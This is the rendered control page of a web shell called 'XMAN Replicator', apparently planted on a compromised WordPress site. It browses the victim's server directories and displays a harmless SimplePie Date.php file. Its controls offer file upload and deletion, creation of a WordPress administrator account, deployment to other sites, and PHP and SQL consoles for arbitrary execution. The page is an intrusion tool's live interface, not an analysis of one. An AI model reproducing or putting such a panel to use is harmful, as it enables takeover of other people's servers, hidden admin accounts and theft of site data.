🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
vestsxzf
/
public_html
/
wp-includes
/
SimplePie
/
library
/
SimplePie
/
Parse
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-11-13 03:07
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-12-30 06:49
🔄
🗑️
🗑️📁
⬇️
🔒
Date.php
565 B
-rw-r--r--
2025-12-03 03:08
✏️
🔄
🗑️
⬇️
🔒
View: Date.php
<?php // SPDX-FileCopyrightText: 2004-2023 Ryan Parman, Sam Sneddon, Ryan McCue // SPDX-License-Identifier: BSD-3-Clause declare(strict_types=1); use SimplePie\Parse\Date; class_exists('SimplePie\Parse\Date'); // @trigger_error(sprintf('Using the "SimplePie_Parse_Date" class is deprecated since SimplePie 1.7.0, use "SimplePie\Parse\Date" instead.'), \E_USER_DEPRECATED); /** @phpstan-ignore-next-line */ if (\false) { /** @deprecated since SimplePie 1.7.0, use "SimplePie\Parse\Date" instead */ class SimplePie_Parse_Date extends Date { } }
PHP Console
Execute
SQL Console
Execute